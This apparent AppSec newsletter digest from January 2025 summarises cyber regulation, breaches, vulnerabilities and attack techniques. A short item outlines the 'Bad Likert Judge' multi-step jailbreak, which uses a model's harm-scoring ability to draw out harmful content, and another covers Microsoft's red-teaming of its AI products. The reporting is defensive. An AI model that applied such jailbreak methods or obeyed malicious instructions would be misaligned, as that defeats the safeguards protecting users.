- Robert Grupe's AppSecNewsBits
- Posts
- Robert Grupe's AppSecNewsBits 2025-01-18
Robert Grupe's AppSecNewsBits 2025-01-18
New Year Starts with a Bang: Cyber Security Legal & Regulatory Guidance
Robert Grupe
January 18, 2025
LEGAL & REGULATORY
Secure software development practices are not sufficient to address the potential for cyber incidents from resourced and determined nation-state actors. To mitigate the risk of such incidents occurring, software providers must also address how software is delivered and the security of the software itself.
Key provisions include:
Software Supply Chain Security: This initiative requires software providers to submit machine-readable attestations of secure development practices, which must be validated by the Cybersecurity and Infrastructure Security Agency within 90 days.
Federal Cybersecurity Enhancements: Introduces stronger endpoint detection and response (EDR) tools, phishing-resistant authentication methods, and updated cloud security protocols, with implementation deadlines set for 120 days.
Quantum-Resistant Cryptography: Sets a goal for federal agencies to transition to post-quantum cryptographic standards by 2030, with “detailed plans” to be submitted within 90 days.
AI for Cyber Defense: Launches initiatives to use artificial intelligence to bolster cybersecurity, particularly in critical infrastructure sectors like energy, with pilot programs required to begin within 180 days.
Cybersecurity in Space: Requires enhanced protections for space systems and ground stations to address evolving threats, with agency reviews and updates to cybersecurity requirements due within 180 days.
Open Source Software Management: Encourages agencies to adopt best practices for using and securing open source software, with recommendations to be issued within 120 days.
New Requirements for Vendors: Mandates minimum cybersecurity practices for federal contractors and establishes a “Cyber Trust Mark” for consumer Internet-of-Things devices, with implementation required within 240 days. Upon closer examination, this executive order appears to set a series of strategic traps in the form of numerous deadlines that will constrain the incoming administration, particularly the Department of Governmental Efficiency, also widely known as DOGE, led by Vivek Ramaswamy and Elon Musk. These compressed timelines seem designed to overwhelm federal agencies, potentially paving the way for partisan blame games if implementation falls short. This appears to be an attempt to undermine DOGE’s efforts under the pretext of cybersecurity reform.
The order, issued on January 16, calls for “improving accountability for software and cloud service providers, strengthening the security of federal communications and identity management systems, and promoting innovative developments and the use of emerging technologies for cybersecurity across executive departments and agencies (agencies) and with the private sector are especially critical to improvement of the nation’s cybersecurity.”
The order features nine sections mandating 52 agency actions across the federal government over the next several years, from bolstering software security supply chains to combatting cybercrime and fraud through digital identity documents to launching pilot programs to improve cybersecurity through artificial intelligence.
To combat the rapidly rising tide of identity-based cyber threats, the EO strongly encourages “the use of digital identity documents to access public benefits programs that require identity verification, so long as it is done in a manner that supports the principles of privacy, accessibility, data minimization, and interoperability.” The order stresses that the federal government must adopt more rigorous third-party risk management practices and greater assurance that software providers support critical government services. It stipulates, among other things, that the Federal Acquisition Regulatory Council (FAR Council) must require software providers to submit software development attestations of sufficient secure software development practices.
The order requires federal agencies to begin using, as appropriate, commercial phishing-resistant standards such as WebAuthn in pilot deployments or larger deployments to prioritize phishing-resistant authentication options. The EO requires federal agencies to protect against adversarial nations and criminals by ensuring that routing information originated and propagated across the internet using the border gateway protocol (BGP) is protected against attack and misconfiguration.
The EO states that the federal government must “accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.” The chief factor determining how much of the EO is accepted or rejected by the Trump administration is who will ultimately be named to fulfill the top cybersecurity policy positions at the White House, at the Cybersecurity and Infrastructure Security Agency (CISA), and elsewhere in the federal government.
The EU’s Digital Operational Resilience Act (DORA) is here. The new legislation officially entered into force on January 17, 2025, and organizations falling under DORA’s scope can now face substantial penalties for non-compliance.
The provisions apply to banks, insurance and investment companies. Third-party IT providers within the financial industry are also in scope. As well as a focus on resilience, the law also seeks to address rising supply chain and third-party risks.
Non-compliant organizations can incur fines up to 2% of their global annual turnover or €10m ($10.2m), whichever is higher.
Third-party organizations may also face fines of up to 1% of their average daily global turnover for each day of non-compliance, for up to six months.
Additionally, regulatory authorities have the power to limit or suspend non-compliant financial firms’ business activities until they achieve full compliance.
Notably, DORA includes individual liability for business leaders for their firm’s compliance failures, who can receive a maximum penalty of €1m ($1.02m).
“Firms have had years to prepare, and the various supervisory authorities responsible for the implementation have been proactive in providing education and resources to ensure all participants understand the requirements.”
Despite the positive signs, there are aspects of DORA that are causing compliance concerns. A report by Orange Cyberdefense found that 43% of the UK financial services industry will miss the DORA compliance deadline and will not be compliant for at least three months.
Compliance delays appear to be primarily related to the provisions around ICT third-party risk management.
The attack on the U.S. Treasury was disclosed to the public in late December 2024.
The breach was possible after the hackers exploited a zero-day vulnerability in the remote support platform BeyondTrust.
The Treasury announced that the operation was conducted by “Silk Typhoon” (a.k.a. Hafnium), a team of skilled cyberspies who target a broad range of organizations in the U.S., Japan, Australia, and Vietnam.
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Yin Kecheng, a Shanghai-based hacker for his role in the recent Treasury breach and a company associated with the Salt Typhoon threat group. “Yin Kecheng has been a cyber actor for over a decade and is affiliated with the People’s Republic of China Ministry of State Security (MSS). Yin Kecheng was associated with the recent compromise of the Department of the Treasury’s Departmental Offices network.”
The sanctions imposed on Kecheng and the Chinese cybersecurity firm under Executive Order (E.O.) 13694 block all property and financial assets located in the United States or are in the possession of U.S. entities, including banks, businesses, and individuals. Additionally, U.S. entities are prohibited from conducting any transactions with the sanctioned entities without OFAC's explicit authorization.
U.S. Treasury's announcement reiterates that the U.S. Department of State offers, through its Rewards for Justice program, up to $10,000,000 for information leading to uncovering the identity of hackers who have targeted the U.S. government or critical infrastructure in the country.
The White House unveiled what it calls the Final Rule on Artificial Intelligence Diffusion from the Biden-Harris government, placing limits on the number of AI-focused chips that can be exported to most countries, but allowing exemptions for key allies and partners.
However GPU supremo Nvidia claims the proposed rules are so harmful that it has published a document strongly criticizing the decision. "This sweeping overreach would impose bureaucratic control over how America's leading semiconductors, computers, systems and even software are designed and marketed globally. And by attempting to rig market outcomes and stifle competition – the lifeblood of innovation – the Biden administration's new rule threatens to squander America's hard-won technological advantage."
Nvidia shares were down by 4 percent in response to the news, according to MarketWatch, which published an alarming claim that 80 percent of the market for GPUs may evaporate if the policy is enacted.
The United Nations Security Council held a meeting to discuss the dangers of commercial spyware, which marks the first time this type of software — also known as government or mercenary spyware — has been discussed at the Security Council.
While the meeting was mostly informal and didn’t end with any concrete proposals, most of the countries involved, including France, South Korea, and the United Kingdom, agreed that governments should take action to control the proliferation and abuse of commercial spyware. Russia and China, on the other hand, dismissed the concerns.
Russia pointed blame at the United States. The Russian representative, referring to historical revelations of NSA spying by U.S. whistleblower Edward Snowden, said that, “it was the United States specifically who created a veritable system for global surveillance and illegal interference in the private life of their own citizens, and citizens of other countries, and continue perfecting this system.”
China’s representative criticized the meeting itself, saying that discussing “the so-called commercial spyware and the maintenance of international peace and security is putting the cart before the horse when compared to the more harmful proliferation activities by governments. Since the Stuxnet incident, the proliferation of advanced national cyber weapons have created a series of major internet risks, which are far more harmful than commercial spyware.”
Texas has sued one of the nation’s largest car insurance providers alleging that it violated the state’s privacy laws by surreptitiously collecting detailed location data on millions of drivers and using that information to justify raising insurance premiums.
In 2015, Allstate developed the Arity Driving Engine software development kit (SDK), a package of code that the company allegedly paid mobile app developers to install in their products in order to collect a variety of sensitive data from consumers’ phones. The SDK gathered phone geolocation data, accelerometer, and gyroscopic data, details about where phone owners started and ended their trips, and information about “driving behavior,” such as whether phone owners appeared to be speeding or driving while distracted.
Neither Allstate and Arity nor the app developers properly informed customers in their privacy policies about what data the SDK was collecting or how it would be used.
“The personal data of millions of Americans was sold to insurance companies without their knowledge or consent in violation of the law. Texans deserve better and we will hold all these companies accountable.” In its complaint, filed in federal court, Texas requested that Allstate be ordered to pay a penalty of $7,500 per violation of the state’s data privacy law and $10,000 per violation of the state’s insurance code, which would likely amount to millions of dollars given the number of consumers allegedly affected.
The lawsuit also asks the court to make Allstate delete all the data it obtained through actions that allegedly violated the privacy law and to make full restitution to customers harmed by the companies’ actions.
New York attorney general's investigation into the company's security practices found various failings that led to 2.47 million people's data being compromised.
Genuine company credentials were used to make the initial intrusion, and these credentials were shared among five employees.
One of the credentials hadn't been updated in ten years.
Enzo also didn't require multi-factor authentication (MFA), its processes for encrypting data at rest were deemed ineffective, and it was found to have taken an "informal" approach to evaluating IT risk, among other findings.
"Getting blood work or medical testing should not result in patients having their personal and health information stolen by cybercriminals. Healthcare companies like Enzo that do not prioritize data security put patients at serious risk of fraud and identity theft. Data security is part of patient safety."
The ICO warned that it will intervene if Google cannot demonstrate existing legal requirements for such tech, including options to secure freely-given consent, ensure fair processing, and uphold the right to erasure:
"Businesses should not consider fingerprinting a simple solution to the loss of third-party cookies and other cross-site tracking signals."
The company's updated platform program policies include relaxed restrictions on advertisers and personalized ad targeting across a range of devices, an outcome of a larger "advertising ecosystem shift" and the advancement of privacy-enhancing technologies (PETs) like on-device processing and trusted execution environments, in the words of the company.
A departure from its longstanding pledge to user choice and privacy, Google argues these technologies offer enough protection for users while also creating “new ways for brands to manage and activate their data safely and securely."
The new feature will be available to advertisers beginning Feb. 16, 2025.
Contrary to other data collection tools like cookies, digital fingerprinting is difficult to spot, and thus even harder for even privacy-conscious users to erase or block.
On Dec. 19, the UK's Information Commissioner’s Office (ICO) — a data protection and privacy regulator — labeled Google "irresponsible" for the policy change, saying the shift to fingerprinting is an unfair means of tracking users, reducing choice and control over their personal information. The watchdog also warned that the move could encourage riskier advertiser behavior.
Hackers have compromised location aggregator Gravy Analytics, stealing “customer lists, information on the broader industry, and even location data harvested from smartphones which show peoples’ precise movements.” This has dumped a trove of sensitive data into the public domain.
This particular leak has spawned various lists of apps, allegedly “hijacked to spy on your location.” These include dating sites Tinder and Grindr; massive games such as Candy Crush, Temple Run, Subway Surfers, and Harry Potter: Puzzles & Spells; transit app Moovit; My Period Calendar & Tracker, a period-tracking app with more than 10 million downloads; popular fitness app MyFitnessPal; social network Tumblr; Yahoo’s email client; Microsoft’s 365 office app; and flight tracker Flightradar24.... religious-focused apps such as Muslim prayer and Christian Bible apps, various pregnancy trackers, and many VPN apps, which some users may download, ironically, in an attempt to protect their privacy.
In the United States, the federal government has long urged against paying ransom demands but has stopped short of imposing an outright national ban on ransom payments.
However, in October 2023, a U.S.-led alliance of more than 40 countries vowed not to pay ransoms to cybercriminals in a bid to starve the hackers from their source of income.
The potential benefits of using NHS data to train AI models are indeed significant, with promising prospects for research advancements, improved patient outcomes, and cost savings.
However, we must not overlook the substantial data privacy, confidentiality and security challenges that accompany this initiative.
Non-profit privacy advocacy group "None of Your Business" (noyb) has filed six complaints against TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi, for unlawfully transferring European user's data to China and infringing European Union's general data protection regulation (GDPR). noyb filed the complaints at data protection authorities (DPAs) in Greece, Italy, Belgium, the Netherlands, and Austria on behalf of users in the same countries.
The Supreme Court in its ruling held that the risk to national security posed by TikTok’s ties to China overcomes concerns about limiting speech by the app or its 170 million users in the United States.
The decision came against the backdrop of unusual political agitation by President-elect Donald Trump, who vowed that he could negotiate a solution, and the administration of President Joe Biden, which has signaled it won’t enforce the law — which was passed with overwhelming bipartisan support — beginning Sunday, his final full day in office.
[rG: However Google (and Apple) will probably block TikTok in retaliation for YouTube lost revenue, and ISPs will block due to uncertainty about potential enforcement.]
The Biden administration finalized a new rule that would effectively ban all Chinese vehicles from the US under the auspices of blocking the “sale or import” of connected vehicle software from “countries of concern.”
The rule could have wide-ranging effects on big automakers, like Ford and GM, as well as smaller manufacturers like Polestar — and even companies that don’t produce cars, like Waymo. The rule covers everything that connects a vehicle to the outside world, such as Bluetooth, Wi-Fi, cellular, and satellite components. It also addresses concerns that technology like cameras, sensors, and onboard computers could be exploited by foreign adversaries to collect sensitive data about US citizens and infrastructure. And it would ban China from testing its self-driving cars on US soil.
The Alliance for Automotive Innovation, which represents GM, Ford, Volkswagen, Toyota, and others, said in comments submitted last April that it supports the goal of the proposed rules but warned that the global automotive supply chain “is one of the world’s largest and most complex” and that parts could not be simply swapped out without disruptions.
The White House states in its fact sheet that the rule prevents the import or sale of connected vehicles “by entities who are owned by, controlled by, or subject to the jurisdiction or direction of the PRC or Russia – even if those vehicles were made in the United States.”
EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
UnitedHealth hid its Change Healthcare data breach notice for months
Change Healthcare, the UnitedHealth-owned health tech company that lost more than 100 million people’s sensitive health data in a ransomware attack last year, said that the company has “substantially” completed notifying affected individuals about the massive data breach.
The February 2024 ransomware attack on Change Healthcare, one of the biggest processors of patient billing in the United States, resulted in months-long outages that disrupted care across the U.S. healthcare system. The data breach also became the largest known theft of medical data in U.S. history. Change Healthcare paid the hackers a ransom with the aim of preventing them from publishing any more of the stolen data, and in exchange, obtained a copy of the stolen data to begin notifying people whose information was taken.
TechCrunch’s review of the breach notice’s web page source code reveals Change Healthcare included hidden “noindex” code on the notice, which tells search engines to ignore the web page, making it more difficult for anyone searching the web for the notice to find it in search results. Change Healthcare had been including the “noindex” code on its data breach notice since at least November 20, 2024. Change Healthcare has been criticized for being slow to notify affected individuals of the breach — the company only started to do so four months after it had received a copy of the stolen files.
The delay in public disclosure prompted several U.S. states, including California, Massachusetts, Nebraska and New Hampshire, to intervene by notifying residents to stay alert to identity theft and fraud following the data breach. In December 2024, Nebraska brought legal action against Change Healthcare for a string of security failings that led to the breach.
The package is grabbing the output of a env command which will include many configuration options for your system.
Often things like AWS keys, NPM tokens, GitHub credentials and other sensitive variables are exposed by the env command, so guess what? The threat actor now has all those credentials too!
Luckily, the OpenSSF package analysis scanner identified these packages as malicious. OSV generated 3 malware advisories: MAL-2025-27, MAL-2025-28 and MAL-2025-29.
The user who published the NPM package uses a snyk[.]io email address for the Snyk Security Labs team. This part of the metadata cannot be faked. The author field in the metadata specifically mentions an employee at Snyk. This part of the NPM package metadata can be faked, but since the publisher is a verified Snyk email, my guess is that this genuinely came from Snyk.
I’ve alerted NPM but these packages haven’t been marked as malicious yet, so no security tool could protect you from these malicious packages. Unfortunately, that’s how most software supply chain security tools work: you have to know that a package is malicious before the tool can protect you. But in general, it’s a good idea not to install NPM packages blindly.
PowerSchool, whose school records software is used to support more than 60 million students across the United States, was hit by an intrusion in December that compromised the company’s customer support portal with stolen credentials, allowing access to reams of personal data belonging to students and teachers in K-12 schools.
PowerSchool hasn’t said how many of its school customers are affected.
Startup necromancy: Dead Google Apps domains can be compromised by new owners
Given the number of people working for tech startups (6 million), the failure rate of said startups (90 percent), their usage of Google Workspaces (50 percent), and the speed at which startups tend to fall apart, there are a lot of Google-auth-connected domains up for sale at any time.
That would not be an inherent problem, except that, buying a domain with a still-active Google account can let you re-activate the Google accounts for former employees. With admin access to those accounts, you can get into many of the services they used Google's OAuth to log into, like Slack, ChatGPT, Zoom, and HR systems.
Ayrey bought a defunct startup domain and got access to each of those through Google account sign-ins, and ended up with tax documents, job interview details, and direct messages, among other sensitive materials.
Google's instructions note that canceling a Google Workspace "doesn't remove user accounts. Any domain that used Google Workspace accounts to authenticate with third-party services and failed to delete their Google account to remove its domain link before selling the domain could be vulnerable.
Ayrey's proposed fix, which he suggested to Google, is to include two new immutable identifiers inside its OpenID Connect claims: one tied to the user that never changes and one tied to the domain.
FBI Warned Agents It Believes Phone Logs Hacked Last Year
FBI leaders have warned that they believe hackers who broke into AT&T Inc.’s system last year stole months of their agents’ call and text logs, setting off a race within the bureau to protect the identities of confidential informants. FBI officials told agents across the country that details about their use on the telecom carrier’s network were believed to be among the billions of records stolen, according to the document and interviews with a current and a former law enforcement official. They asked not to be named to discuss sensitive information. Data from all FBI devices under the bureau’s AT&T service for public safety agencies were presumed taken. The cache of hacked AT&T records didn’t reveal the substance of communications but, according to the document, could link investigators to their secret sources. The data was believed to include agents’ mobile phone numbers and the numbers with which they called and texted. AT&T publicly disclosed the breach in July and said it included six months worth of mobile phone customer data from 2022. The hackers threatened to sell the data unless the telecommunications company paid an extortion fee.
Russia's largest platform for state procurement hit by cyberattack from pro-Ukraine group
The previously unknown pro-Ukraine hacker group Yellow Drift claimed responsibility for the attack on Roseltorg, stating they had deleted 550 terabytes of data, including emails and backups. As proof, the hackers published screenshots from the platform’s allegedly compromised infrastructure.
How OpenAI’s bot crushed this seven-person company’s website ‘like a DDoS attack’
Triplegangers CEO Oleksandr Tomchuk was alerted that his company’s e-commerce site was down. It looked to be some kind of distributed denial-of-service attack. He soon discovered the culprit was a bot from OpenAI that was relentlessly attempting to scrape his entire, enormous site. “We have over 65,000 products, each product has a page. Each page has at least three photos.” OpenAI was sending “tens of thousands” of server requests trying to download all of it, hundreds of thousands of photos, along with their detailed descriptions. “OpenAI used 600 IPs to scrape data, and we are still analyzing logs from last week."
Tomchuk has a terms of service page on its site that forbids bots from taking its images without permission. But that alone did nothing. Websites must use a properly configured robot.txt file with tags specifically telling OpenAI’s bot, GPTBot, to leave the site alone. (OpenAI also has a couple of other bots, ChatGPT-User and OAI-SearchBot, that have their own tags, according to its information page on its crawlers.)
Not only was Triplegangers knocked offline by OpenAI’s bot during U.S. business hours, but Tomchuk expects a jacked-up AWS bill thanks to all of the CPU and downloading activity from the bot.
Aviatrix Controllers OS Command Injection Vulnerability: Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Fortinet FortiOS Authorization Bypass Vulnerability: Fortinet FortiOS contains an authorization bypass vulnerability that may allow an unauthenticated remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Microsoft Windows Hyper-V NT Kernel Integration VSP Heap-based Buffer Overflow Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a heap-based buffer overflow vulnerability that allows a local attacker to gain SYSTEM privileges
Microsoft Windows Hyper-V NT Kernel Integration VSP Use-After-Free Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a use-after-free vulnerability that allows a local attacker to gain SYSTEM privileges.
Microsoft Windows Hyper-V NT Kernel Integration VSP Use-After-Free Vulnerability: Microsoft Windows Hyper-V NT Kernel Integration VSP contains a use-after-free vulnerability that allows a local attacker to gain SYSTEM privileges.
BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) OS Command Injection Vulnerability: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) contain an OS command injection vulnerability that can be exploited by an attacker with existing administrative privileges to upload a malicious file. Successful exploitation of this vulnerability can allow a remote attacker to execute underlying operating system commands within the context of the site user.
Qlik Sense HTTP Tunneling Vulnerability: Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
HACKING
Scammers file first — Get your IRS Identity Protection PIN now
The IRS relaunched its Identity Protection Personal Identification Number (IP PIN) program this week and all US taxpayers are encouraged to enroll for added security against identity theft and fraudulent returns.
An Identity Protection PIN (IP PIN) is a six-digit number assigned to a taxpayer that must be used when filing a tax return. This number is only valid for the current year, with a new one assigned each tax year.
The IRS advises taxpayers to enroll as early as they can in a calendar year, as cybercriminals commonly attempt to send their tax returns in before taxpayers submit their own.
Ransomware crew abuses AWS native encryption, sets data-destruct timer for 7 days
A new ransomware crew dubbed Codefinger targets AWS S3 buckets and uses the cloud giant's own server-side encryption with customer provided keys (SSE-C) to lock up victims' data before demanding a ransom payment for the symmetric AES-256 keys required to decrypt it.
Because AWS processes the key during encryption but does not store it, the victim cannot decrypt their data without the attacker-generated key. Historically AWS Identity IAM keys are leaked and used for data theft but if this approach gains widespread adoption, it could represent a significant systemic risk to organizations relying on AWS S3 for the storage of critical data Codefinger breaks into victim orgs' cloud storage buckets using publicly exposed or compromised AWS keys with write and read permissions to execute "s3:GetObject" and "s3:PutObject" requests.
AWS customers should restrict the use of SSE-C. This can be achieved by leveraging the Condition element in IAM policies to prevent unauthorized applications of SSE-C on S3 buckets, ensuring that only approved data and users can utilize this feature.
Plus, it's important to monitor and regularly audit AWS keys, as these make very attractive targets for all types of criminals looking to break into companies' cloud environments and steal data.
Permissions should be reviewed frequently to confirm they align with the principle of least privilege, while unused keys should be disabled, and active ones rotated regularly to minimize exposure.
FBI forces Chinese malware to delete itself from thousands of US computers
The People's Republic of China (PRC) government paid the Mustang Panda group to develop a version of PlugX malware used to infect, control, and steal information from victim computers. The malware has been known for years, but many Windows computers were still infected while their owners were unaware.
The FBI learned of a method to remotely remove the malware from a French law enforcement agency, which had gained access to a command-and-control server that could send commands to infected computers. The FBI said it provided notices to Internet service providers that host the IP addresses used by the victims, and that the notices ask each ISP to inform customers of the malware deletion.
The operation was similar to one conducted a year ago on hundreds of infected routers. OFAC also announced sanctions against Sichuan Juxinhe Network Technology Co., a Chinese cybersecurity firm believed to be directly involved with the Salt Typhoon state hacker group.
New LLM jailbreak uses models’ evaluation skills against them
A new jailbreak method for large language models (LLMs) takes advantage of models’ ability to identify and score harmful content in order to trick the models into generating content related to malware, illegal activity, harassment and more.
The “Bad Likert Judge” multi-step jailbreak technique was developed and tested by Palo Alto Networks Unit 42, and was found to increase the success rate of jailbreak attempts by more than 60% when compared with direct single-turn attack attempts. Overall, when tested across 1,440 cases using six different “state-of-the-art” models, the Bad Likert Judge jailbreak method had about a 71.6% average attack success rate across models.
In order to mitigate jailbreaks like Bad Likert Judge, maintainers of LLM applications should apply content filters that evaluate both the inputs and outputs of conversations to block potentially harmful content from being generated. Content filters work in addition to models’ built-in safeguards from training.
When Bad Likert Judge was tested on models with content filters applied, the success rate was reduced by 89.2% on average.
Even modest makeup can thwart facial recognition
While previous efforts, such as CV Dazzle, adversarial patches, and Juggalo makeup, relied on bold, high-contrast modifications to disrupt facial detection, these approaches often suffer from two critical limitations: their theatrical prominence makes them easily recognizable to human observers, and they fail to address modern face detectors trained on robust key-point models.
In contrast, this study demonstrates that effective disruption of facial recognition can be achieved through subtle darkening of high-density key-point regions (e.g., brow lines, nose bridge, and jaw contours) without triggering the visibility issues inherent to overt disguises.
APPSEC, DEVSECOPS, DEV
CISA Issues Cybersecurity Guidance for IT Sector
The Cybersecurity and Infrastructure Agency has published guideposts for the IT industry to help improve cybersecurity throughout the software development lifecycle.
The guidance, called IT Sector-Specific Goals, or IT SSGs, recommends voluntary cybersecurity steps aligned with Secure by Design principles pinpointing and addressing vulnerabilities in pre-product release and improving incident response and software security.
The IT SSGs’ recommendations include:
Network segmentation and other controls to segregate the software development ecosystem
Instituting regular logging, monitoring and trust reviews on authorization and access across the software development environments
Providing phishing-resistant multifactor authentication in the access of all software development processes within the ecosystem
Establishing security protocols for software used in the development process
Storing sensitive data and credentials through encryption instead of source code
Creation of a software supply chain risk management plan
CISA and FBI Release Updated Guidance on Product Security Bad Practices
All software manufacturers are strongly encouraged to avoid these product security bad practices. The bad practices are divided into three categories.
Product properties, which describe the observable, security-related qualities of a software product.
Security features, which describe the security functionalities that a product supports.
Organizational processes and policies, which describe the actions taken by a software manufacturer to ensure strong transparency in its approach to security.
CISA Releases Microsoft Expanded Cloud Logs Implementation Playbook
CISA released the Microsoft Expanded Cloud Logs Implementation Playbook to help organizations get the most out of Microsoft’s newly introduced logs in Microsoft Purview Audit (Standard). This step-by-step guide enables technical personnel to better detect and defend against advanced intrusion techniques by operationalizing expanded cloud logs.
CISA and US and International Partners Publish Guidance on Priority Considerations in Product Selection for OT Owners and Operators
CISA—along with U.S. and international partners—released joint guidance Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products. As part of CISA’s Secure by Demand series, this guidance focuses on helping customers identify manufacturers dedicated to continuous improvement and achieving a better cost balance, as well as how Operational Technology (OT) owners and operators should integrate secure by design elements into their procurement process.
OWASP Publishes First-Ever Top 10 “Non-Human Identities (NHI) Security Risks
The Open Worldwide Application Security Project’s (OWASP) released the first “Non-Human Identities (NHI) Top 10 used to provide authorization to software entities such as applications, APIs, bots, and automated systems to access secured resources.
Improper Offboarding
Secret Leakage
Vulnerable Third-Party NHIs
Insecure Authentication
Overprivileged NHIs
Insecure Cloud Deployment Configurations
Long-Lived Secrets
Environment Isolation
NHI Reuse
Human Use of NHIs
The number of organizations conducting adversarial tests (abuse cases) has doubled year-over-year.
The number of organizations performing software composition analysis (SCA) on code repositories has increased by 67%.
The number of organizations employing research groups to develop new attack methods has grown by 30%.
The number of organizations generating software bills of materials (SBOMs) for deployed software has risen by 22%. Trends
Secure Innovation: As organizations grapple with the opportunities and risks of AI and machine learning (ML), many are struggling to define and secure this new, evolving attack surface. A key trend observed is a ~30% increase in organizations engaging research groups to develop new attack methods. Additionally, the use of adversarial tests (abuse cases) has more than doubled since the previous report (BSIMM14).
Software Supply Chain Security: With self-attestation requirements for selling software to the U.S. government, organizations are increasingly prioritizing activities that support compliance. For example, there has been a 22% rise in the number of organizations creating SBOMs for deployed software, and a 67% increase in organizations performing software composition analysis (SCA) on code repositories.
Declining Security Awareness Training: In 2008, 100% of organizations in BSIMM1 conducted software security awareness training. However, this rate has steadily declined, and in BSIMM15, only 51.2% of organizations are still providing basic security training to their teams, marking the lowest rate observed to date.
Microsoft eggheads say AI can never be made secure – after testing Redmond's own products
Microsoft brainiacs who probed the security of more than 100 of the software giant's own generative AI products came away with a sobering message: The models amplify existing security risks and create new ones.
Azure CTO Mark Russinovich among them, argue that with further work, the cost of attacking AI systems can be raised – as has already happened for other IT security risks through defense-in-depth tactics and security-by-design principles.
And in that respect it's perhaps all not too surprising – is any non-trivial computer system ever totally utterly secure? Some say yes, some say no.
"We found that larger models were generally better at adhering to user instructions, which is a core capability that makes models more helpful," the authors state. That’s good news for users, but bad for defenders because the models are more likely to follow malicious instructions."
The authors also advise considering the security implications of a model’s capabilities in the context of its purpose. To understand why, consider that an attack on an LLM designed to help creative writing is unlikely to create an organizational risk, but adversarial action directed against an LLM that summarizes patients’ healthcare histories could produce many unwelcome outcomes.
Research Reveals Security Implications of FIDO2 and Synced Passkeys
The concerns include the potential for remote attacks and the creation of single points of failure in cases where passkey providers might be compromised. Such security challenges have led some organizations, like RSA, to develop solutions using device-bound passkeys as an alternative to synced credentials.
Hikvision Password Reset Brute Forcing
One common pattern in password resets is sending a one-time password to the user to enable them to reset their password. But there is a critical issue that is often overlooked: The page verifying the code MUST implement some basic brute force protection. Otherwise, it tends to be easy to brute force the code, which is often just a five or six-digit number. Of course, this assumes that the code is random!
This has been an issue a few times already. Facebook, for example, suffered from this weakness last year. Only a limited number of attempts should be allowed to implement some brute force protection, and the time the code is valid should be constrained.
In my opinion, for an "average" site, five attempts and 30 minutes seem reasonable.
VENDORS & PLATFORMS
Google Releases Open Source Library for Software Composition Analysis
OSV-SCALIBR (Software Composition Analysis LIBRary), an open source library for software composition analysis. Released as an open source Go library, the tool is an extensible file system scanner designed to extract information on software inventory and identify vulnerabilities.
OSV-SCALIBR can either be used as a standalone binary (a wrapper around the library), or can be imported into Go projects as a library. The tool supports software composition analysis (SCA) for packages, binaries, and source code.
It can be used to scan OS packages on Linux, Windows, and macOS, and supports artifact and lockfile scanning in several programming languages.
Just as your LLM once again goes off the rails, Cisco, Nvidia are at the door smiling
Nvidia introduced a trio of specialized microservices aimed at stopping your own AI agents from being hijacked by users or spouting inappropriate stuff onto the 'net.
Cisco AI Defense focuses on two main areas: accessing AI applications, and building and running AI applications.
Enterprises in for a shock when they realize power and cooling demands of AI
72 percent of corporate leaders are aware AI models have huge energy requirements, and many are concerned about this, yet only 13 percent monitor the power consumption of the AI systems they have deployed.
The power draw is driven in most cases by reliance on power-hungry GPUs that are crammed into high-performance server systems to tackle model training. By 2027, most corporate leaders will be keeping a close check on energy consumption as a key performance indicator (KPI).
Adding impetus to this is the rise of so-called agentic AI models. These are developed to be capable of taking autonomous actions and solving multi-step problems, and their greater complexity will add to energy woes. For organizations sticking with GPUs, dealing with the heat generated by the power-guzzling hardware is becoming another big issue, with Nvidia's Blackwell products rated at 1,200 W, for example.
In many cases, this will involve more effective cooling systems, with liquid cooling becoming increasingly popular. However, not all facilities will be suitable for outfitting with liquid cooling. While traditional facilities were built around halls with racks of 2-5 kW power density, new builds now have to accommodate much higher. Liquid cooling is essential in racks with greater than 10 kW power density and is desirable in the 5-10 kW range.
There is likely a ceiling to how much density can be raised. At one Equinix site I saw a retrofit project result in rack density increasing from 10 kW to 30 kW per rack.
Technology Architecture Reviews Generate Value From AI Investments Particularly for AI investments, tech leaders will need to have a full understanding of their data and consider storage requirements or risk planned AI projects failing as a result. An effective review will assess IT applications, data, integration and infrastructure. Looking at elements in isolation isn’t enough.